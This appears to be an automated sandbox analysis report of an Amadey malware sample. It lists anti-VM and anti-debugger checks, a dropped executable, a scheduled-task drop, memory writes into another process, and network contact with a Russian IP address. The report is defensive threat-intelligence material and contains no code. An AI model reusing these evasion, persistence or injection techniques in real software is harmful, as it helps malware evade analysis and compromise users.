2024-05-14 01:02
Reported
2024-05-14 01:04
Platform
win10v2004-20240508-en
Max time kernel
142s
Max time network
127s
Command Line
Signatures
Amadey
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\axplons.job | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 904 wrote to memory of 3144 | N/A | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe |
| PID 904 wrote to memory of 3144 | N/A | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe |
| PID 904 wrote to memory of 3144 | N/A | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe
"C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe"
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4232,i,1067197275908310731,12785105794523264014,262144 --variations-seed-version --mojo-platform-channel-handle=4404 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| RU | 5.42.96.7:80 | 5.42.96.7 | tcp |
| US | 8.8.8.8:53 | 7.96.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files